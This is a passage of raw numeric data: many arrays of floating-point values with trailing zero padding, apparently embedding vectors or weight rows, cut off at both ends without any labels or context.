-0.529792, 0.632014, 0.131595, 0.912824, -0.210146, 0.185044, -0.272321, -0.498203, 1.04523, -0.0697466, 0.61814, -0.422931, -0.0768065, -0.0734682, 0.270916, 0.0662151, -0.0247586, -0.0853778, -0.166939, 0.88423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0716973, -0.0321429, 0.995733, 1.65158, 0.4486, -0.2668, -0.279997, -0.295772, -0.0274633, 0.894018, 0.44209, -0.0459541, -0.247326, -0.285901, 0.359705, 0.162596, 0.101761, -2.02761, 0.249227, -0.265854, 0.606784, 3.77775, -0.390437, -0.194477, -0.245431, 0.0586054, -0.0894925, 0.343451, -0.0168846, 0.664829, -1.17053, 0.311021, 0.323193, -0.791682, 0.259467, 1.23814, -0.288636, -0.693498, -0.655983, 1.53559, 0.124918, 0.412381, 1.44981, 0.929878, -0.412055, 0.885917, 0.0106018, -0.295417, -0.461025, 0.827771, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00213756, -0.0177322, -0.0372171, 0.0354855, -0.0379738, 0.0117428, -0.0121942, 0.0375851, -0.0119044, -0.033455, -0.00826878, -0.0216166, -0.0437959, 0.0204018, -0.00300489, -0.0321401, -0.0108619, 0.0342246, 0.0397044, -0.0132903, 0.0281059, -0.0130442, 0.00795963, -0.0269545, -0.0526397, -0.014759, 0.030816, -0.0547975, 0.00157945, -0.0292682, -0.0353629, -0.0448542, -0.016911, -0.00566901, -0.00430547, -0.0434755, -0.0427578, -0.0201945, 0.0287031, -0.0139538, -0.057616, -0.0459023, 0.0286891, -0.0524381, -0.0215663, 0.0330415, 0.0352593, 0.0125468, 0.0245162, -0.0510235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.03011, -0.0405279, 0.0108045, 0.0401139, 0.0190238, 0.0324352, -0.00484946, -0.00163389, -0.0138208, -0.0479658, -0.0359132, -0.0272989, -0.0382358, -0.0311243, -0.0590816, 0.0268027, -0.0393461, 0.0393425, 0.0153631, -0.0390952, 0.00700256, 0.0114334, -0.00781544, -0.0119168, -0.0415509, -0.0206005, -0.0561342, 0.0323343, -0.0375461, 0.0185421, 0.0415488, -0.0494538, -0.0481142, 0.0313641, 0.0112539, -0.00920479, -0.0557967, 0.00331631, -0.0122617, -0.0273039, -0.0260745, 0.0349213, -0.000685518, -0.0296436, -0.00940391, -0.0372281, -0.0236736, 0.0114687, -0.0342062, -0.0166429, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.13428, -0.250338, 0.623958, -0.729949, 0.347875, 0.793534, -0.122709, -1.56755, -0.584357, -0.698489, -0.266717, -0.337845, 0.460555, 0.86423, 0.999238, 0.410328, -1.16663, -1.51657, 0.206326, 0.562607, 0.485309, -0.820394, -0.336925, 0.0236041, 0.246445, 0.734784, 0.0765648, -0.587131, 0.0358843, 0.263845, 1.62644, -1.08102, -0.21132, 0.2875, 0.759702, -0.0693274, -0.435554, 0.722822, -0.168314, -0.39852, -0.123358, -1.34996, 0.0648622, -0.0595177, -0.385708, 0.235199, 0.0230252, 0.137372, 0.709628, 0.0370117, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0987396, -0.301334, -1.24903, -0.00527879, 1.11306, 0.410202, -0.732398, 0.770142, 0.565242, 0.90791, -0.520159, 0.0784915, 1.77222, -0.0930948, -0.434791, -0.271347, 0.842861, 0.378459, -0.185053, 0.940164, -0.368434, 0.428824, -0.939798, 0.564421, -0.354606, 0.245881, 0.0599714, 0.523408, 0.00783036, 0.92352, -1.00592, 1.03324, 0.287522, -0.225465, -0.745112, 0.510052, -0.711423, -0.966533, -0.326624, 1.37277, 0.166693, 1.67628, -0.105982, 0.743245, 0.549448, 0.131662, -0.0185182, -0.58483, -0.0162535, 0.0700885, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.111798, -0.384229, -0.0158996, 0.493751, 0.480073, -0.486706, -0.239616, 0.370729, -0.946915, -0.259901, -0.554722, -0.242543, 0.117089, -0.265586, -0.0225331, 0.0794114, -0.651464, 0.108682, 0.364962, -1.09949, 0.373657, -0.665573, -0.498233, 1.80907, 0.00478645, 0.0234078, 0.0265564, 0.011716, 0.000637847, 0.219931, -0.154491, 0.589365, -0.130138, -0.0491897, -0.630479, 0.234976, 0.641299, 0.1846, 1.39282, -0.856502, -0.284169, -0.784024, 1.2357, -0.253055, 0.109481, 1.34239, 0.0191636, -0.315844, 0.309959, 0.892919, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.361696, -0.155853, 0.357446, 0.0539081, 0.357154, -0.333738, 0.191132, 0.988624, 0.0120792, 0.975624, 0.169848, 0.475589, 0.470524, 0.212149, 0.466674, 0.356372, 0.146268, -1.47089, -1.28099, 0.866954, 1.1385, 1.15731, -0.232466, -0.105836, -0.640213, 0.359842, 0.626513, -0.721511, -0.023073, -0.250567, 0.300248, -0.527798, 0.0927905, 0.743142, 0.117781, 0.36634, -0.000262944, -0.959162, -0.0768731, 0.135232, -1.22383, 0.552452, 0.377563, -0.418466, -0.371429, 0.184774, 0.0276081, 0.22172, -0.242397, -0.429049, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.514525, 0.729256, 0.566363, -0.068331, 0.534624, 0.00407463, -0.234775, -0.531789, 0.317295, -0.64761, 0.466008, -0.45097, 1.53966, 0.511095, -0.21549, 0.110444, -0.0404913, 0.569019, -0.491996, -0.544028, -0.0384042, -1.12107, -0.645575, 1.60107, -0.412113, 0.415298, -0.210109, 0.463746, 0.0151899, 0.266624, 0.364622, 0.228394, -0.350788, -0.307127, -0.437094, 0.559687, -0.23262, -1.06045, 0.186825, 0.545562, -0.497559, -0.865114, 1.51154, -0.207088, -0.110948, 0.386485, -0.0383098, 0.51944, 0.296507, 0.313408, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0516356, 0.270851, 0.337394, -0.310922, -0.333552, 0.240163, -1.19217, -0.143668, 0.422523, 0.565454, -0.28792, -1.02371, -0.512708, 0.551776, -0.831587, -0.363269, 1.69815, 2.126, -1.40338, -0.837417, -0.029906, -2.16894, 0.551952, 0.672213, 0.304685, 0.572517, 0.265048, 0.200276, 0.00572581, 0.847064, 0.77713, 1.04569, 0.12396, 0.488076, 0.377977, -0.714093, 0.191592, 1.39399, 0.568423, -0.461299, 0.788451, -0.323824, -1.33839, 0.112985, -1.55039, 0.557742, 0.0203518, 0.0621359, 0.513316, 1.08671, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.525018, -0.0544026, -1.01671, -0.583964, -1.05477, 0.498755, -0.301903, -0.273579, -0.0124779, 1.80194, -0.149194, -0.579677, 0.0611759, -0.523195, -0.812707, 0.0576258, 0.0467645, -0.00180995, -0.283825, 0.221157, 1.29346, 0.47674, -0.109894, -0.0230372, 0.00831431, -0.53638, -0.693933, 0.617845, 0.0370008, 0.051438, -2.31771, 0.420819, 0.592334, 0.596215, -0.0329991, -0.178674, 0.267148, -0.870494, -0.0401763, 0.0978662, -0.840034, -0.127339, -0.0074795, 0.149865, 0.550228, 0.00430642, 0.0366502, 0.0806032, -0.515249, 0.0243668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0444, -0.466823, -0.320242, 0.6829, -0.116566, 0.0969473, 0.189347, -0.423045, 0.167971, 0.201212, 0.0787913, -0.0270053, 1.47947, 0.176775, 0.76833, -0.103811, 0.482491, 0.455804, -0.482848, 0.509984, 0.497933, 1.63258, 0.124691, 2.07697, 0.0209384, 0.392648, -0.415528, -0.281414, 0.0374414, -0.307279, 1.11838, 1.16398, -4.50772, 0.0841608, 0.163104, -0.195651, -0.131116, 0.525142, -0.111291, -0.121802, 0.0648282, 0.237227, 1.98529, -0.0724213, -0.292497, 0.626733, 0.0184495, -0.0786084, -0.18906, 0.0744121, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.837116, -0.451647, -0.227174, -1.89145, 0.697434, 0.597035, -0.91283, -3.63761, 0.296452, 1.27, 0.0133363, -0.317362, -0.256243, 0.639785, 0.756469, 0.285274, 0.485967, -1.4202, 0.0483243, 0.725402, 2.17914, -1.34179, 0.545126, 0.311659, -0.921769, 0.323842, 1.83966, 0.313664, -0.027313, -0.179077, 2.571, 0.317315, 0.430738, 0.363456, 0.0215819, -0.146503, -0.908032, -0.798715, -0.109191, -0.488424, -0.873893, 0.885527, -0.100551, 0.265515, -0.991745, -0.115295, -0.00277927, 0.887395, 0.208105, 0.160605, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.987425, -0.11875, 0.112092, 0.0154184, -0.373812, 0.0570874, -0.519055, 0.727709, 0.944432, 0.24383, -0.852422, 0.298895, 0.0540951, 0.75339, 0.00644077, 0.0151592, -0.125989, 0.0271444, 1.58999, 0.00545091, -0.0423867, -5.52104, 0.282836, -0.336109, 0.1686, -0.0495667, 1.10847, -2.96101, -0.0113971, -0.281469, 0.0302631, -0.0283551, 1.14307, 0.254046, 0.0916907, -0.0176987, -0.928124, 0.27087, 0.152317, -0.0242254, -0.2972, -0.905688, 0.265359, -0.717016, -0.882268, 0.19797, -0.0490131, 0.12463, -0.242621, 0.198049, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.220779, -1.90471, -0.117091, -1.61355, -1.09943, 0.25002, 0.524479, -0.279029, 0.928462, 0.930619, 0.123065, -0.14276, 0.25306, 1.89695, -0.0161813, -0.215993, -0.165291, 0.0415913, -0.593551, 0.527864, 0.327697, -0.287304, 0.348936, 1.71165, 0.423018, 0.658318, 0.102095, 0.0308208, -0.0148748, -0.146764, 2.03565, -0.216566, 0.008719, -0.0762305, 0.22058, 0.512423, 0.0953863, 1.49071, -0.390167, 0.519073, 0.284427, -0.611205, -1.38521, 0.231062, -2.50482, 1.0336, -0.00303558, 0.233293, 0.193347, 0.209275, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0220463, 0.0553504, -0.0548471, 2.54483, -0.56593, 0.168413, 0.725362, 0.441704, -0.237492, 0.477621, -0.212039, 0.029527, -0.187649, -0.118575, 2.72367, -0.145059, -0.232839, -0.191228, 1.35749, -0.494896, -0.464176, -1.60674, -0.0340444, 0.159353, -0.133211, 0.0332512, 0.669341, -1.36153, -0.0489647, -0.260807, 0.424787, 1.50956, 2.24948, -0.255507, 0.506954, 0.434642, -0.736513, 1.04918, 0.266098, 0.00363076, 0.026298, 0.678124, -0.20829, -0.227042, -0.18946, -0.00145864, -0.0219063, 1.2319, -0.0801564, -0.0762384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.678059, 1.1399, -0.22875, 0.555605, -0.571683, 0.893775, 0.814943, 0.169423, -0.209838, -0.377271, 0.204791, 0.153569, -0.420929, 0.388324, 0.232883, -0.355148, 0.488644, 0.0540576, 0.303034, 0.926561, 0.290213, 0.622966, 0.554027, -0.114579, -0.690312, -0.120495, 0.675638, 0.465693, -0.00285802, -0.05475, 1.55823, -1.94291, 0.184791, -0.4625, -0.264168, -0.186122, -0.211548, 0.133794, -0.197938, -0.285481, -0.43557, -0.559847, -0.0683882, 0.217929, 1.24071, -0.480507, 0.00834116, 0.262503, 0.0511805, -0.394065, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.302832, -0.61937, 0.238654, -0.810509, -0.33906, -0.29936, 0.624312, 0.246324, -0.794042, 0.322352, 0.208332, 0.165682, 0.781704, -0.017636, 0.171101, -0.196268, -0.34468, -0.965811, -0.410092, -1.37901, -0.197653, 1.35369, 0.0517519, 2.39088, 0.145099, 0.00530625, -0.0102088, -0.57524, -0.0246001, 0.551582, -3.19226, 0.370856, -0.526842, -0.13315, 0.547295, -0.00531671, -0.6378, 0.0146852, -0.00445634, 1.14827, 0.492917, 0.261022, 0.676864, -0.0254317, -0.663054, 1.26256, 0.000234208, 0.0824745, -0.182618, 1.22212, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.353421, 0.06693, 0.0493675, 1.11491, -0.11735, 0.0129366, -0.595701, 1.25142, 0.0401045, 1.05399, -0.132534, 0.143223, -0.265396, -0.555765, 1.34896, 1.30419, 0.335002, 1.88137, -1.96034, -1.12523, -2.2207, 0.704169, 0.260637, 0.177509, 0.477575, -0.06193, -1.01149, -0.103457, 0.0268643, 0.312808, -3.85086, -0.332733, -0.737561, 0.6836, -0.151069, -0.358002, 0.904066, -0.565119, -0.34653, -0.0970678, 0.463389, -0.324567, -0.195591, -0.0121379, 0.710366, -0.00606038, 0.02502, 0.151435, 0.343557, -0.0257731, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.419705, 0.307169, -0.0684055, -0.285063, 0.752186, -0.297043, -0.639381, 0.620681, 0.241017, 0.949954, -0.175313, 0.391498, 0.102996, -0.714793, -0.146078, 0.204128, 0.694055, 0.837949, -0.00613179, 0.768307, 0.254637, 2.33354, 1.25866, -0.681729, 0.71549, -0.332926, 0.24988, 0.550644, 0.0193044, -0.347419, -1.2856, 0.8295, -0.153006, 0.354459, 1.26299, 0.0470904, -0.337803, 1.59117, 0.84554, 0.574368, 0.314708, 0.285017, -0.168212, -0.34106, 0.390118, 0.317648, -0.017023, 0.292082, -0.229685, 0.280504, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.604195, -0.250477, 0.176706, -0.485326, 0.518547, 0.420182, 0.764687, -0.501107, 0.000365409, 0.286571, -0.199593, -0.0687697, -0.090422, 0.100321, 1.87315, -0.550087, -0.237736, -0.0451625, 0.0368874, -1.01324, -1.19145, -0.364827, -0.0852119, 0.177982, 0.191533, -0.690354, -0.108199, -1.06864, 0.0438091, 0.0537388, 0.29812, 1.28159, -3.40777, -0.0139586, 0.773688, 0.0906515, 1.23175, 0.310602, -0.421719, -0.364482, 0.164712, 0.959822, 0.16763, -0.315777, 0.0315317, -0.0750104, 0.0424572, -0.0261545, 0.131214, 0.190929, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.631095, -0.136922, 0.192901, 1.83294, -1.31448, 0.363289, -0.703304, 0.194517, 0.0866417, -0.39153, 0.244252, -0.130668, 1.04194, 0.0715847, 0.0447545, -0.011265, -0.0613804, 0.0164184, -0.283611, 0.558953, -1.0236, 1.70124, -0.520204, -0.357118, 0.23171, 0.413674, 0.831299, -0.652587, 0.0123612, 1.01369, -0.0921471, 1.85926, -0.274953, 0.00396854, 0.499007, -0.0583653, -0.542197, -0.508693, 1.44272, -0.149894, 0.0667491, 0.228924, -0.188943, -0.145105, 0.713286, -0.230636, 0.0299255, -0.433946, 0.118381, 1.12851, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.483853, -0.692982, 0.387779, -1.92043, 1.29098, -0.126597, -1.12485, -0.830632, 0.953765, 0.460391, 0.352012, -0.0950456, -0.0743421, -0.512201, -0.717967, 0.364853, 0.589011, 1.08016, -0.323416, -0.969957, -0.334382, -1.96493, -1.15467, 0.938891, 0.641144, -0.429325, -0.517366, -0.212861, 0.0194235, 0.800349, -0.0433732, 0.754006, 0.113681, -0.194989, 0.269262, 0.647329, 0.848724, 0.0227557, -1.17363, 0.835602, -0.541707, -0.0115212, -1.2729, -0.099127, -0.712511, 0.309546, 0.0364309, 0.353441, 0.510056, -0.066493, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.16261, 0.0806572, 0.109944, -2.1608, 1.55843, -0.220991, 0.54939, -1.26189, 0.324906, 1.04322, 0.0226836, 0.0212751, 0.535402, 0.94868, -0.291586, -0.887279, 0.586977, 0.993646, 0.314019, -0.728011, -0.0153085, -0.0630331, 0.27053, -0.532896, 1.48371, 0.481589, -1.03356, 0.585105, -0.0192347, -0.0840928, 0.939875, 0.929374, 0.0354388, 0.712848, 0.865863, -0.456905, 0.110715, -0.754562, 0.0300391, -0.255174, 0.758188, 0.0729846, -0.800102, 0.476582, 0.285396, 0.182881, -0.0160676, 0.628726, 0.0887909, 0.417291, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.013818, -2.83876, 0.115447, 1.48861, 0.315034, -0.293435, 0.339216, 0.835236, -0.730367, 0.319519, 0.178446, 0.251807, -0.865353, -0.536422, -0.000729229, 0.226427, -1.24616, 0.678098, 0.445178, 0.2023, 0.307007, 1.54061, 0.0174903, 0.0373027, -1.04215, 0.209201, -0.555062, 0.00669197, -0.0189377, 0.376469, 1.13693, 0.674628, -0.648387, -0.154484, 0.632653, 0.38521, -0.0822036, 1.06651, -0.375359, 0.575826, 0.175674, -0.804813, 0.964043, 0.535563, 0.164744, -1.07992, -0.0224722, 0.196535, 0.0714568, -0.623305, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.928138, -0.00595678, 0.336375, -0.169218, -0.985612, 0.1415, -0.780787, -0.237728, 0.106957, -0.579064, 0.0989813, -0.618345, 0.0749403, 0.802177, 1.21517, 1.03999, -0.235491, -1.39204, -0.495839, 0.509667, -0.995234, -1.66584, -0.360576, 0.0352511, 1.34724, -0.103969, 0.0043113, -1.47883, -0.0332519, -0.187471, 1.25882, 0.622869, -0.43553, 0.762699, -0.0678183, 0.445816, -0.237375, -0.672961, -0.174105, -0.304865, 1.56023, 0.23417, -0.331839, 0.249164, -0.496398, -0.0882022, -0.0321028, 1.45215, -2.31595, -0.0793209, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.634067, -0.412231, -3.85573, 0.883424, 0.0598685, -0.672404, -0.983054, -0.0404367, 0.358804, 2.0421, -0.690923, -0.307581, 0.309472, -0.101254, -0.722647, 0.407052, 0.181685, 1.64256, 0.107321, -0.13899, -0.915169, -0.906936, -0.580116, 0.341549, -0.202902, -0.585784, -0.137057, 0.393363, -0.0436475, -0.320947, -0.738847, 0.383385, -0.829556, -0.393829, -0.496141, 0.688188, -0.129879, 0.147726, -0.100137, -2.44239, 0.652694, 0.601216, -0.0534787, -0.678199, -1.01819, 0.00666774, 0.00920475, 0.716198, 0.619922, -0.417474, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.224496, 